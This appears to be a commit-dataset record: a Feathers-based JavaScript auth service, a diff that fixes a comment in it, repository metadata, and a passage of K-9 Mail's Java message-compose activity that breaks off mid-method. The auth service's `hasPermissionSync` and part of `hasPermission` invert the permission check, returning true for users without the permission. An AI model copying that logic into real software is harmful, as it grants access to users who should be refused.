auth } catch(err) {} module.exports = auth
app/services/auth.service.js
/** * Dream Code Auth Service * * Client-Side Authentication and Authorization Service * * Creates a global `auth` constant * Methods * * - __authenticate({ email, password }) - internal method * * - login({ email, password }) * * - logout() * * - signup({ email, name, password }) * * - changePassword({ oldPassword, newPassword }) * * - changeMyIdentity( password, { email, name }) - Must be logged in * * - verifySignUp( verifyToken ) * * - verifyChanges( verifyToken ) * * - resendVerification( email ) * * - sendResetPassword( email ) * * - resetPassword( email ) * * - getToken() * * - isLoggedIn() * * - hasPermission( permissionName ) - * Checks user permissions against a single permission string * but waits for login request to finish * * - hasPermissionSync( permissionName ) * * Properties * - currentUser - Containers the current user definition */ const auth = { currentUser: null, __authenticate: user => { user = user ? Object.assign(user, { strategy: 'local' }): undefined return feathers.authenticate( user ) .then(response => { if(window.location.hostname.indexOf('localhost') > -1) { notify.log('Access Token: ', response.accessToken) notify.log('User: ', response.user) } feathers.set('user', response.user) auth.currentUser = feathers.get('user') return auth.currentUser // return feathers.passport.verifyJWT(response.accessToken) }) }, login: async user => { auth.logout() var [err, foundUser] = await to( auth.__authenticate(user) ) if(!err) { notify.success(`Hello ${foundUser.name || foundUser.email}`) return auth.currentUser } else { notify.warning(err.message) notify.debug('Error authenticating', err) auth.logout() return false } }, logout: async user => { feathers.logout() feathers.set('user', null) auth.currentUser = null }, signup: async user => { if(!user) { notify.error('Please fill out the user information') return false } auth.logout() let [err, result] = await api.users.create(user) if(!err) { let options = { type: 'local', email: user.email, password: user.password } let [authFail, currentUser] = await to( auth.__authenticate(user) ) if(!authFail) { notify.success(`Hello ${currentUser.name || currentUser.email}. Please check your email and verify so we can protect your account.`) return auth.currentUser } else { notify.error(parseErrors(authFail), 'Error signing up') return false } } else { if(err.code === 409) { notify.error('That email is already taken.') } else { notify.error(parseErrors(err)) } return false } }, changePassword: async function(oldPassword, password) { if(!_.get(auth, 'currentUser.email')) { notify.warning('You must be logged in to change your password.') return false } let options = { action: 'passwordChange', value: { user: { email: auth.currentUser.email }, oldPassword, password } } let [err, result] = await api.authManagement.create(options) if(!err) { notify.success('Your current password has been changed. Next time you log in please use the new password.') } else { notify.error(err.message) } }, changeMyIdentity: async function(password, changes) { if(!_.get(auth, 'currentUser.email')) { notify.warning('You must be logged in to update your account.') return false } if(!password) { notify.warning('You must provide a password to update your account.') return false } if(!changes) { notify.warning('Please provide information to update your account with.') return false } let options = { action: 'identityChange', value: { password, changes, user: { email: auth.currentUser.email } } } let [err, result] = await api.authManagement.create(options) if(!err) { notify.success('The changes are pending. Please check your email to verify that you made the change.') } else { notify.error(err.message) } }, verifySignUp: async function verifySignUp(slug) { if(!slug) { return false } let [err, response] = await api.authManagement.create({ action: 'verifySignupLong', value: slug }) if(!err) { notify.success('Your email has been verified. We can now protect your account.') } else { notify.error('Sorry, but we could not verify your email.') notify.debug("Verify Email Error: ", err) } return response }, verifyChanges: async function verifyChanges(slug) { if(!slug) { return false } let [err, response] = await api.authManagement.create({ action: 'verifySignupLong', value: slug }) if(!err) { notify.success('You have approved the changes to your account. You may now sign in under the new email.') } else { notify.error('Sorry, but we could not approved the changes to your account.') notify.debug("Verify Changes Error: ", err) } }, resendVerification: async function resendVerification(email) { if(_.get(auth, 'currentUser.isVerified')) { return notify.success("This account has already been verified") } if(!email) { notify.success('Please fill out your email to verify.') return false } let options = { action: 'resendVerifySignup', value: { email } } let [err, result] = await api.authManagement.create(options) if(!err) { notify.success('Another verification email has been sent.') } else { notify.error('Sorry but we could not send a verification email.') } }, sendResetPassword: async function sendResetPassword(email) { if(!email) { notify.warning('Please provide your email so we can send you a reset password email.') return false } let options = { action: 'sendResetPwd', value: { email } } let [err, result] = await api.authManagement.create(options) if(!err) { notify.success('Please check your email. A link to reset your password has been sent.') } else { notify.warning(err.message) notify.debug('Error sending reset password email', err) } }, resetPassword: async function saveResetPassword(slug, password) { let options = { action: 'resetPwdLong', value: { token: slug, password } } let [err, result] = await api.authManagement.create(options) if(!err) { notify.success('Your password was updated. You may now sign in under the new password.') return true } else { notify.warning('Sorry but there was an error updating your password.') } }, getToken: () => feathers.get('token'), isLoggedIn: () => { return auth.__authenticate().then(response => { auth.currentUser = feathers.get('user') return auth.currentUser }, err => { notify.debug("Currently not logged in") }) }, hasPermission: permissionName => { let privs = _.get(auth, 'currentUser.permissions') if(!privs) { return this.isLoggedIn().then(isLoggedIn => { if(!isLoggedIn) { return false } auth.currentUser = feathers.get('user') let privs = _.get(auth, 'currentUser.permissions') return !privs || (!privs.includes(permissionName) && _.get(auth, 'currentUser.role') !== 'admin') }, err => { return false }) } else { if(privs.includes(permissionName) || _.get(auth, 'currentUser.role') === 'admin') { return true } else { return false } } }, hasPermissionSync: permissionName => { let privs = _.get(auth, 'currentUser.permissions') return !privs || (!privs.includes(permissionName) && _.get(auth, 'currentUser.role') !== 'admin') } } try { global.auth = auth } catch(err) {} module.exports = auth
Fixes commented code in auth service.
app/services/auth.service.js
Fixes commented code in auth service.
<ide><path>pp/services/auth.service.js <ide> * - hasPermissionSync( permissionName ) <ide> * <ide> * Properties <del> * - currentUser - Containers the current user definition <add> * - currentUser - Contains the current user definition <ide> */ <ide> <ide> const auth = { <ide> feathers.set('user', response.user) <ide> auth.currentUser = feathers.get('user') <ide> return auth.currentUser <del> <del> // return feathers.passport.verifyJWT(response.accessToken) <add> <ide> }) <ide> <ide> },
Java
bsd-3-clause
4c1060ecae19cb03e4ca1e67eae3480d308b3f62
0
bashrc/k-9,github201407/k-9,leixinstar/k-9,dgger/k-9,k9mail/k-9,tonytamsf/k-9,herpiko/k-9,rtreffer/openpgp-k-9,leixinstar/k-9,439teamwork/k-9,dpereira411/k-9,cketti/k-9,thuanpq/k-9,icedman21/k-9,torte71/k-9,leixinstar/k-9,deepworks/k-9,crr0004/k-9,mawiegand/k-9,WenduanMou1/k-9,denim2x/k-9,tsunli/k-9,sebkur/k-9,vt0r/k-9,tonytamsf/k-9,philipwhiuk/q-mail,konfer/k-9,nilsbraden/k-9,GuillaumeSmaha/k-9,rollbrettler/k-9,XiveZ/k-9,dgger/k-9,cooperpellaton/k-9,huhu/k-9,tsunli/k-9,WenduanMou1/k-9,moparisthebest/k-9,gilbertw1/k-9,dhootha/k-9,k9mail/k-9,sanderbaas/k-9,KitAway/k-9,vt0r/k-9,k9mail/k-9,github201407/k-9,herpiko/k-9,Eagles2F/k-9,huhu/k-9,crr0004/k-9,dhootha/k-9,suzp1984/k-9,sanderbaas/k-9,rishabhbitsg/k-9,sonork/k-9,farmboy0/k-9,cooperpellaton/k-9,gilbertw1/k-9,gnebsy/k-9,rollbrettler/k-9,ndew623/k-9,sebkur/k-9,sonork/k-9,denim2x/k-9,moparisthebest/k-9,sebkur/k-9,vasyl-khomko/k-9,philipwhiuk/q-mail,cliniome/pki,gnebsy/k-9,sedrubal/k-9,imaeses/k-9,KitAway/k-9,sanderbaas/k-9,nilsbraden/k-9,philipwhiuk/k-9,vatsalsura/k-9,bashrc/k-9,G00fY2/k-9_material_design,thuanpq/k-9,farmboy0/k-9,farmboy0/k-9,msdgwzhy6/k-9,icedman21/k-9,dgger/k-9,Eagles2F/k-9,denim2x/k-9,cliniome/pki,cketti/k-9,gaionim/k-9,cketti/k-9,cliniome/pki,icedman21/k-9,Valodim/k-9,XiveZ/k-9,dhootha/k-9,WenduanMou1/k-9,GuillaumeSmaha/k-9,nilsbraden/k-9,cketti/k-9,Eagles2F/k-9,indus1/k-9,imaeses/k-9,thuanpq/k-9,konfer/k-9,deepworks/k-9,gnebsy/k-9,439teamwork/k-9,crr0004/k-9,huhu/k-9,vasyl-khomko/k-9,gaionim/k-9,ndew623/k-9,439teamwork/k-9,sedrubal/k-9,suzp1984/k-9,rishabhbitsg/k-9,jca02266/k-9,github201407/k-9,msdgwzhy6/k-9,philipwhiuk/q-mail,G00fY2/k-9_material_design,jberkel/k-9,dpereira411/k-9,herpiko/k-9,rtreffer/openpgp-k-9,CodingRmy/k-9,mawiegand/k-9,jca02266/k-9,philipwhiuk/k-9,ndew623/k-9,msdgwzhy6/k-9,gilbertw1/k-9,cooperpellaton/k-9,bashrc/k-9,suzp1984/k-9,indus1/k-9,XiveZ/k-9,torte71/k-9,CodingRmy/k-9,GuillaumeSmaha/k-9,KitAway/k-9,tsunli/k-9,imaeses/k-9,jca02266/k-9,gaionim/k-9,vasyl-khomko/k-9,rollbrettler/k-9,konfer/k-9,roscrazy/k-9,dpereira411/k-9,roscrazy/k-9,sonork/k-9,moparisthebest/k-9,tonytamsf/k-9,torte71/k-9,jberkel/k-9,mawiegand/k-9,vatsalsura/k-9,deepworks/k-9
package com.fsck.k9.activity; import java.io.File; import java.io.Serializable; import java.io.UnsupportedEncodingException; import java.net.URLDecoder; import java.util.ArrayList; import java.util.Date; import java.util.List; import java.util.StringTokenizer; import org.apache.james.mime4j.codec.EncoderUtil; import android.app.AlertDialog; import android.app.Dialog; import android.content.ContentResolver; import android.content.Context; import android.content.DialogInterface; import android.content.Intent; import android.content.pm.ActivityInfo; import android.database.Cursor; import android.net.Uri; import android.os.AsyncTask; import android.os.Bundle; import android.os.Handler; import android.os.Parcelable; import android.provider.OpenableColumns; import android.text.TextWatcher; import android.text.util.Rfc822Tokenizer; import android.util.Log; import android.view.KeyEvent; import android.view.Menu; import android.view.MenuItem; import android.view.View; import android.view.View.OnClickListener; import android.view.View.OnFocusChangeListener; import android.view.Window; import android.widget.AutoCompleteTextView.Validator; import android.widget.CheckBox; import android.widget.EditText; import android.widget.ImageButton; import android.widget.LinearLayout; import android.widget.MultiAutoCompleteTextView; import android.widget.TextView; import android.widget.Toast; import com.fsck.k9.Account; import com.fsck.k9.EmailAddressAdapter; import com.fsck.k9.EmailAddressValidator; import com.fsck.k9.Identity; import com.fsck.k9.K9; import com.fsck.k9.Preferences; import com.fsck.k9.R; import com.fsck.k9.controller.MessagingController; import com.fsck.k9.controller.MessagingListener; import com.fsck.k9.crypto.CryptoProvider; import com.fsck.k9.helper.Utility; import com.fsck.k9.mail.Address; import com.fsck.k9.mail.Body; import com.fsck.k9.mail.Flag; import com.fsck.k9.mail.Message; import com.fsck.k9.mail.Message.RecipientType; import com.fsck.k9.mail.MessagingException; import com.fsck.k9.mail.Multipart; import com.fsck.k9.mail.Part; import com.fsck.k9.mail.internet.MimeBodyPart; import com.fsck.k9.mail.internet.MimeHeader; import com.fsck.k9.mail.internet.MimeMessage; import com.fsck.k9.mail.internet.MimeMultipart; import com.fsck.k9.mail.internet.MimeUtility; import com.fsck.k9.mail.internet.TextBody; import com.fsck.k9.mail.store.LocalStore; import com.fsck.k9.mail.store.LocalStore.LocalAttachmentBody; public class MessageCompose extends K9Activity implements OnClickListener, OnFocusChangeListener { private static final int DIALOG_SAVE_OR_DISCARD_DRAFT_MESSAGE = 1; private static final String ACTION_REPLY = "com.fsck.k9.intent.action.REPLY"; private static final String ACTION_REPLY_ALL = "com.fsck.k9.intent.action.REPLY_ALL"; private static final String ACTION_FORWARD = "com.fsck.k9.intent.action.FORWARD"; private static final String ACTION_EDIT_DRAFT = "com.fsck.k9.intent.action.EDIT_DRAFT"; private static final String EXTRA_ACCOUNT = "account"; private static final String EXTRA_MESSAGE_BODY = "messageBody"; private static final String EXTRA_MESSAGE_REFERENCE = "message_reference"; private static final String STATE_KEY_ATTACHMENTS = "com.fsck.k9.activity.MessageCompose.attachments"; private static final String STATE_KEY_CC_SHOWN = "com.fsck.k9.activity.MessageCompose.ccShown"; private static final String STATE_KEY_BCC_SHOWN = "com.fsck.k9.activity.MessageCompose.bccShown"; private static final String STATE_KEY_QUOTED_TEXT_SHOWN = "com.fsck.k9.activity.MessageCompose.quotedTextShown"; private static final String STATE_KEY_SOURCE_MESSAGE_PROCED = "com.fsck.k9.activity.MessageCompose.stateKeySourceMessageProced"; private static final String STATE_KEY_DRAFT_UID = "com.fsck.k9.activity.MessageCompose.draftUid"; private static final String STATE_IDENTITY_CHANGED = "com.fsck.k9.activity.MessageCompose.identityChanged"; private static final String STATE_IDENTITY = "com.fsck.k9.activity.MessageCompose.identity"; private static final String STATE_CRYPTO = "crypto"; private static final String STATE_IN_REPLY_TO = "com.fsck.k9.activity.MessageCompose.inReplyTo"; private static final String STATE_REFERENCES = "com.fsck.k9.activity.MessageCompose.references"; private static final int MSG_PROGRESS_ON = 1; private static final int MSG_PROGRESS_OFF = 2; private static final int MSG_UPDATE_TITLE = 3; private static final int MSG_SKIPPED_ATTACHMENTS = 4; private static final int MSG_SAVED_DRAFT = 5; private static final int MSG_DISCARDED_DRAFT = 6; private static final int ACTIVITY_REQUEST_PICK_ATTACHMENT = 1; private static final int ACTIVITY_CHOOSE_IDENTITY = 2; private static final int ACTIVITY_CHOOSE_ACCOUNT = 3; /** * The account used for message composition. */ private Account mAccount; /** * This identity's settings are used for message composition. * Note: This has to be an identity of the account {@link #mAccount}. */ private Identity mIdentity; private boolean mIdentityChanged = false; private boolean mSignatureChanged = false; /** * Reference to the source message (in case of reply, forward, or edit * draft actions). */ private MessageReference mMessageReference; private Message mSourceMessage; private String mSourceMessageBody; /** * Indicates that the source message has been processed at least once and should not * be processed on any subsequent loads. This protects us from adding attachments that * have already been added from the restore of the view state. */ private boolean mSourceMessageProcessed = false; private TextView mFromView; private MultiAutoCompleteTextView mToView; private MultiAutoCompleteTextView mCcView; private MultiAutoCompleteTextView mBccView; private EditText mSubjectView; private EditText mSignatureView; private EditText mMessageContentView; private LinearLayout mAttachments; private View mQuotedTextBar; private ImageButton mQuotedTextDelete; private EditText mQuotedText; private View mEncryptLayout; private CheckBox mCryptoSignatureCheckbox; private CheckBox mEncryptCheckbox; private TextView mCryptoSignatureUserId; private TextView mCryptoSignatureUserIdRest; private CryptoProvider mCrypto = null; private String mReferences; private String mInReplyTo; private boolean mDraftNeedsSaving = false; private boolean mPreventDraftSaving = false; /** * The draft uid of this message. This is used when saving drafts so that the same draft is * overwritten instead of being created anew. This property is null until the first save. */ private String mDraftUid; private Handler mHandler = new Handler() { @Override public void handleMessage(android.os.Message msg) { switch (msg.what) { case MSG_PROGRESS_ON: setProgressBarIndeterminateVisibility(true); break; case MSG_PROGRESS_OFF: setProgressBarIndeterminateVisibility(false); break; case MSG_UPDATE_TITLE: updateTitle(); break; case MSG_SKIPPED_ATTACHMENTS: Toast.makeText( MessageCompose.this, getString(R.string.message_compose_attachments_skipped_toast), Toast.LENGTH_LONG).show(); break; case MSG_SAVED_DRAFT: Toast.makeText( MessageCompose.this, getString(R.string.message_saved_toast), Toast.LENGTH_LONG).show(); break; case MSG_DISCARDED_DRAFT: Toast.makeText( MessageCompose.this, getString(R.string.message_discarded_toast), Toast.LENGTH_LONG).show(); break; default: super.handleMessage(msg); break; } } }; private Listener mListener = new Listener(); private EmailAddressAdapter mAddressAdapter; private Validator mAddressValidator; class Attachment implements Serializable { public String name; public String contentType; public long size; public Uri uri; } /** * Compose a new message using the given account. If account is null the default account * will be used. * @param context * @param account */ public static void actionCompose(Context context, Account account) { if (account == null) { account = Preferences.getPreferences(context).getDefaultAccount(); } Intent i = new Intent(context, MessageCompose.class); i.putExtra(EXTRA_ACCOUNT, account.getUuid()); context.startActivity(i); } /** * Compose a new message as a reply to the given message. If replyAll is true the function * is reply all instead of simply reply. * @param context * @param account * @param message * @param replyAll * @param messageBody optional, for decrypted messages, null if it should be grabbed from the given message */ public static void actionReply( Context context, Account account, Message message, boolean replyAll, String messageBody) { Intent i = new Intent(context, MessageCompose.class); i.putExtra(EXTRA_MESSAGE_BODY, messageBody); i.putExtra(EXTRA_MESSAGE_REFERENCE, message.makeMessageReference()); if (replyAll) { i.setAction(ACTION_REPLY_ALL); } else { i.setAction(ACTION_REPLY); } context.startActivity(i); } /** * Compose a new message as a forward of the given message. * @param context * @param account * @param message * @param messageBody optional, for decrypted messages, null if it should be grabbed from the given message */ public static void actionForward( Context context, Account account, Message message, String messageBody) { Intent i = new Intent(context, MessageCompose.class); i.putExtra(EXTRA_MESSAGE_BODY, messageBody); i.putExtra(EXTRA_MESSAGE_REFERENCE, message.makeMessageReference()); i.setAction(ACTION_FORWARD); context.startActivity(i); } /** * Continue composition of the given message. This action modifies the way this Activity * handles certain actions. * Save will attempt to replace the message in the given folder with the updated version. * Discard will delete the message from the given folder. * @param context * @param account * @param folder * @param message */ public static void actionEditDraft(Context context, Account account, Message message) { Intent i = new Intent(context, MessageCompose.class); i.putExtra(EXTRA_MESSAGE_REFERENCE, message.makeMessageReference()); i.setAction(ACTION_EDIT_DRAFT); context.startActivity(i); } @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); requestWindowFeature(Window.FEATURE_INDETERMINATE_PROGRESS); setContentView(R.layout.message_compose); final Intent intent = getIntent(); mMessageReference = (MessageReference) intent.getSerializableExtra(EXTRA_MESSAGE_REFERENCE); mSourceMessageBody = (String) intent.getStringExtra(EXTRA_MESSAGE_BODY); final String accountUuid = (mMessageReference != null) ? mMessageReference.accountUuid : intent.getStringExtra(EXTRA_ACCOUNT); mAccount = Preferences.getPreferences(this).getAccount(accountUuid); if (mAccount == null) { mAccount = Preferences.getPreferences(this).getDefaultAccount(); } if (mAccount == null) { /* * There are no accounts set up. This should not have happened. Prompt the * user to set up an account as an acceptable bailout. */ startActivity(new Intent(this, Accounts.class)); mDraftNeedsSaving = false; finish(); return; } mAddressAdapter = EmailAddressAdapter.getInstance(this); mAddressValidator = new EmailAddressValidator(); mFromView = (TextView)findViewById(R.id.from); mToView = (MultiAutoCompleteTextView)findViewById(R.id.to); mCcView = (MultiAutoCompleteTextView)findViewById(R.id.cc); mBccView = (MultiAutoCompleteTextView)findViewById(R.id.bcc); mSubjectView = (EditText)findViewById(R.id.subject); EditText upperSignature = (EditText)findViewById(R.id.upper_signature); EditText lowerSignature = (EditText)findViewById(R.id.lower_signature); mMessageContentView = (EditText)findViewById(R.id.message_content); mAttachments = (LinearLayout)findViewById(R.id.attachments); mQuotedTextBar = findViewById(R.id.quoted_text_bar); mQuotedTextDelete = (ImageButton)findViewById(R.id.quoted_text_delete); mQuotedText = (EditText)findViewById(R.id.quoted_text); TextWatcher watcher = new TextWatcher() { public void beforeTextChanged(CharSequence s, int start, int before, int after) { } public void onTextChanged(CharSequence s, int start, int before, int count) { mDraftNeedsSaving = true; } public void afterTextChanged(android.text.Editable s) { } }; TextWatcher sigwatcher = new TextWatcher() { public void beforeTextChanged(CharSequence s, int start, int before, int after) { } public void onTextChanged(CharSequence s, int start, int before, int count) { mDraftNeedsSaving = true; mSignatureChanged = true; } public void afterTextChanged(android.text.Editable s) { } }; mToView.addTextChangedListener(watcher); mCcView.addTextChangedListener(watcher); mBccView.addTextChangedListener(watcher); mSubjectView.addTextChangedListener(watcher); mMessageContentView.addTextChangedListener(watcher); mQuotedText.addTextChangedListener(watcher); /* * We set this to invisible by default. Other methods will turn it back on if it's * needed. */ mQuotedTextBar.setVisibility(View.GONE); mQuotedText.setVisibility(View.GONE); mQuotedTextDelete.setOnClickListener(this); mFromView.setVisibility(View.GONE); mToView.setAdapter(mAddressAdapter); mToView.setTokenizer(new Rfc822Tokenizer()); mToView.setValidator(mAddressValidator); mCcView.setAdapter(mAddressAdapter); mCcView.setTokenizer(new Rfc822Tokenizer()); mCcView.setValidator(mAddressValidator); mBccView.setAdapter(mAddressAdapter); mBccView.setTokenizer(new Rfc822Tokenizer()); mBccView.setValidator(mAddressValidator); mSubjectView.setOnFocusChangeListener(this); if (savedInstanceState != null) { /* * This data gets used in onCreate, so grab it here instead of onRestoreIntstanceState */ mSourceMessageProcessed = savedInstanceState.getBoolean(STATE_KEY_SOURCE_MESSAGE_PROCED, false); } String action = intent.getAction(); if (Intent.ACTION_VIEW.equals(action) || Intent.ACTION_SENDTO.equals(action)) { /* * Someone has clicked a mailto: link. The address is in the URI. */ if (intent.getData() != null) { Uri uri = intent.getData(); if ("mailto".equals(uri.getScheme())) { initializeFromMailTo(uri.toString()); } else { String toText = uri.getSchemeSpecificPart(); if (toText != null) { mToView.setText(toText); } } } } //TODO: Use constant Intent.ACTION_SEND_MULTIPLE once we drop Android 1.5 support else if (Intent.ACTION_SEND.equals(action) || Intent.ACTION_SENDTO.equals(action) || "android.intent.action.SEND_MULTIPLE".equals(action)) { /* * Someone is trying to compose an email with an attachment, probably Pictures. * The Intent should contain an EXTRA_STREAM with the data to attach. */ String text = intent.getStringExtra(Intent.EXTRA_TEXT); if (text != null) { mMessageContentView.setText(text); } String subject = intent.getStringExtra(Intent.EXTRA_SUBJECT); if (subject != null) { mSubjectView.setText(subject); } String type = intent.getType(); //TODO: Use constant Intent.ACTION_SEND_MULTIPLE once we drop Android 1.5 support if ("android.intent.action.SEND_MULTIPLE".equals(action)) { ArrayList<Parcelable> list = intent.getParcelableArrayListExtra(Intent.EXTRA_STREAM); if (list != null) { for (Parcelable parcelable : list) { Uri stream = (Uri) parcelable; if (stream != null && type != null) { if (MimeUtility.mimeTypeMatches(type, K9.ACCEPTABLE_ATTACHMENT_SEND_TYPES)) { addAttachment(stream); } } } } } else { Uri stream = (Uri) intent.getParcelableExtra(Intent.EXTRA_STREAM); if (stream != null && type != null) { if (MimeUtility.mimeTypeMatches(type, K9.ACCEPTABLE_ATTACHMENT_SEND_TYPES)) { addAttachment(stream); } } } /* * There might be an EXTRA_SUBJECT, EXTRA_TEXT, EXTRA_EMAIL, EXTRA_BCC or EXTRA_CC */ String extraSubject = intent.getStringExtra(Intent.EXTRA_SUBJECT); String extraText = intent.getStringExtra(Intent.EXTRA_TEXT); mSubjectView.setText(extraSubject); mMessageContentView.setText(extraText); String[] extraEmail = intent.getStringArrayExtra(Intent.EXTRA_EMAIL); String[] extraCc = intent.getStringArrayExtra(Intent.EXTRA_CC); String[] extraBcc = intent.getStringArrayExtra(Intent.EXTRA_BCC); String addressList; // Cache array size, as per Google's recommendations. int arraySize; int i; addressList = ""; if (extraEmail != null) { arraySize = extraEmail.length; for (i=0; i < arraySize; i++) { addressList += extraEmail[i]+", "; } } mToView.setText(addressList); addressList = ""; if (extraCc != null) { arraySize = extraCc.length; for (i=0; i < arraySize; i++) { addressList += extraCc[i]+", "; } } mCcView.setText(addressList); addressList = ""; if (extraBcc != null) { arraySize = extraBcc.length; for (i=0; i < arraySize; i++) { addressList += extraBcc[i]+", "; } } mBccView.setText(addressList); } if (mIdentity == null) { mIdentity = mAccount.getIdentity(0); } if (mAccount.isSignatureBeforeQuotedText()) { mSignatureView = upperSignature; lowerSignature.setVisibility(View.GONE); } else { mSignatureView = lowerSignature; upperSignature.setVisibility(View.GONE); } mSignatureView.addTextChangedListener(sigwatcher); if (!mIdentity.getSignatureUse()) { mSignatureView.setVisibility(View.GONE); } if (!mSourceMessageProcessed) { updateFrom(); updateSignature(); if (ACTION_REPLY.equals(action) || ACTION_REPLY_ALL.equals(action) || ACTION_FORWARD.equals(action) || ACTION_EDIT_DRAFT.equals(action)) { /* * If we need to load the message we add ourself as a message listener here * so we can kick it off. Normally we add in onResume but we don't * want to reload the message every time the activity is resumed. * There is no harm in adding twice. */ MessagingController.getInstance(getApplication()).addListener(mListener); final Account account = Preferences.getPreferences(this).getAccount(mMessageReference.accountUuid); final String folderName = mMessageReference.folderName; final String sourceMessageUid = mMessageReference.uid; MessagingController.getInstance(getApplication()).loadMessageForView(account, folderName, sourceMessageUid, null); } if (!ACTION_EDIT_DRAFT.equals(action)) { String bccAddress = mAccount.getAlwaysBcc(); if ((bccAddress != null) && !("".equals(bccAddress))) { addAddress(mBccView, new Address(bccAddress, "")); } } /* if (K9.DEBUG) Log.d(K9.LOG_TAG, "action = " + action + ", account = " + mMessageReference.accountUuid + ", folder = " + mMessageReference.folderName + ", sourceMessageUid = " + mMessageReference.uid); */ if (ACTION_REPLY.equals(action) || ACTION_REPLY_ALL.equals(action)) { if (K9.DEBUG) Log.d(K9.LOG_TAG, "Setting message ANSWERED flag to true"); // TODO: Really, we should wait until we send the message, but that would require saving the original // message info along with a Draft copy, in case it is left in Drafts for a while before being sent final Account account = Preferences.getPreferences(this).getAccount(mMessageReference.accountUuid); final String folderName = mMessageReference.folderName; final String sourceMessageUid = mMessageReference.uid; MessagingController.getInstance(getApplication()).setFlag(account, folderName, new String[] { sourceMessageUid }, Flag.ANSWERED, true); } updateTitle(); } if (ACTION_REPLY.equals(action) || ACTION_REPLY_ALL.equals(action) || ACTION_EDIT_DRAFT.equals(action)) { //change focus to message body. mMessageContentView.requestFocus(); } mEncryptLayout = (View)findViewById(R.id.layout_encrypt); mCryptoSignatureCheckbox = (CheckBox)findViewById(R.id.cb_crypto_signature); mCryptoSignatureUserId = (TextView)findViewById(R.id.userId); mCryptoSignatureUserIdRest = (TextView)findViewById(R.id.userIdRest); mEncryptCheckbox = (CheckBox)findViewById(R.id.cb_encrypt); initializeCrypto(); if (mCrypto.isAvailable(this)) { mEncryptLayout.setVisibility(View.VISIBLE); mCryptoSignatureCheckbox.setOnClickListener(new OnClickListener() { @Override public void onClick(View v) { CheckBox checkBox = (CheckBox) v; if (checkBox.isChecked()) { mPreventDraftSaving = true; if (!mCrypto.selectSecretKey(MessageCompose.this)) { mPreventDraftSaving = false; } checkBox.setChecked(false); } else { mCrypto.setSignatureKeyId(0); updateEncryptLayout(); } } }); if (mAccount.getCryptoAutoSignature()) { long ids[] = mCrypto.getSecretKeyIdsFromEmail(this, mIdentity.getEmail()); if (ids != null && ids.length > 0) { mCrypto.setSignatureKeyId(ids[0]); mCrypto.setSignatureUserId(mCrypto.getUserId(this, ids[0])); } else { mCrypto.setSignatureKeyId(0); mCrypto.setSignatureUserId(null); } } updateEncryptLayout(); } else { mEncryptLayout.setVisibility(View.GONE); } mDraftNeedsSaving = false; } private void initializeCrypto() { if (mCrypto != null) { return; } mCrypto = CryptoProvider.createInstance(mAccount); } /** * Fill the encrypt layout with the latest data about signature key and encryption keys. */ public void updateEncryptLayout() { if (!mCrypto.hasSignatureKey()) { mCryptoSignatureCheckbox.setText(R.string.btn_crypto_sign); mCryptoSignatureCheckbox.setChecked(false); mCryptoSignatureUserId.setVisibility(View.INVISIBLE); mCryptoSignatureUserIdRest.setVisibility(View.INVISIBLE); } else { // if a signature key is selected, then the checkbox itself has no text mCryptoSignatureCheckbox.setText(""); mCryptoSignatureCheckbox.setChecked(true); mCryptoSignatureUserId.setVisibility(View.VISIBLE); mCryptoSignatureUserIdRest.setVisibility(View.VISIBLE); mCryptoSignatureUserId.setText(R.string.unknown_crypto_signature_user_id); mCryptoSignatureUserIdRest.setText(""); String userId = mCrypto.getSignatureUserId(); if (userId == null) { userId = mCrypto.getUserId(this, mCrypto.getSignatureKeyId()); mCrypto.setSignatureUserId(userId); } if (userId != null) { String chunks[] = mCrypto.getSignatureUserId().split(" <", 2); mCryptoSignatureUserId.setText(chunks[0]); if (chunks.length > 1) { mCryptoSignatureUserIdRest.setText("<" + chunks[1]); } } } } @Override public void onResume() { super.onResume(); MessagingController.getInstance(getApplication()).addListener(mListener); } @Override public void onPause() { super.onPause(); saveIfNeeded(); MessagingController.getInstance(getApplication()).removeListener(mListener); } /** * The framework handles most of the fields, but we need to handle stuff that we * dynamically show and hide: * Attachment list, * Cc field, * Bcc field, * Quoted text, */ @Override protected void onSaveInstanceState(Bundle outState) { super.onSaveInstanceState(outState); saveIfNeeded(); ArrayList<Uri> attachments = new ArrayList<Uri>(); for (int i = 0, count = mAttachments.getChildCount(); i < count; i++) { View view = mAttachments.getChildAt(i); Attachment attachment = (Attachment) view.getTag(); attachments.add(attachment.uri); } outState.putParcelableArrayList(STATE_KEY_ATTACHMENTS, attachments); outState.putBoolean(STATE_KEY_CC_SHOWN, mCcView.getVisibility() == View.VISIBLE); outState.putBoolean(STATE_KEY_BCC_SHOWN, mBccView.getVisibility() == View.VISIBLE); outState.putBoolean(STATE_KEY_QUOTED_TEXT_SHOWN, mQuotedTextBar.getVisibility() == View.VISIBLE); outState.putBoolean(STATE_KEY_SOURCE_MESSAGE_PROCED, mSourceMessageProcessed); outState.putString(STATE_KEY_DRAFT_UID, mDraftUid); outState.putSerializable(STATE_IDENTITY, mIdentity); outState.putBoolean(STATE_IDENTITY_CHANGED, mIdentityChanged); outState.putSerializable(STATE_CRYPTO, mCrypto); outState.putString(STATE_IN_REPLY_TO, mInReplyTo); outState.putString(STATE_REFERENCES, mReferences); } @Override protected void onRestoreInstanceState(Bundle savedInstanceState) { super.onRestoreInstanceState(savedInstanceState); ArrayList<Parcelable> attachments = (ArrayList<Parcelable>) savedInstanceState.getParcelableArrayList(STATE_KEY_ATTACHMENTS); mAttachments.removeAllViews(); for (Parcelable p : attachments) { Uri uri = (Uri) p; addAttachment(uri); } mCcView.setVisibility(savedInstanceState.getBoolean(STATE_KEY_CC_SHOWN) ? View.VISIBLE : View.GONE); mBccView.setVisibility(savedInstanceState.getBoolean(STATE_KEY_BCC_SHOWN) ? View.VISIBLE : View.GONE); mQuotedTextBar.setVisibility(savedInstanceState.getBoolean(STATE_KEY_QUOTED_TEXT_SHOWN) ? View.VISIBLE : View.GONE); mQuotedText.setVisibility(savedInstanceState.getBoolean(STATE_KEY_QUOTED_TEXT_SHOWN) ? View.VISIBLE : View.GONE); mDraftUid = savedInstanceState.getString(STATE_KEY_DRAFT_UID); mIdentity = (Identity)savedInstanceState.getSerializable(STATE_IDENTITY); mIdentityChanged = savedInstanceState.getBoolean(STATE_IDENTITY_CHANGED); mCrypto = (CryptoProvider) savedInstanceState.getSerializable(STATE_CRYPTO); mInReplyTo = savedInstanceState.getString(STATE_IN_REPLY_TO); mReferences = savedInstanceState.getString(STATE_REFERENCES); initializeCrypto(); updateFrom(); updateSignature(); updateEncryptLayout(); mDraftNeedsSaving = false; } private void updateTitle() { if (mSubjectView.getText().length() == 0) { setTitle(R.string.compose_title); } 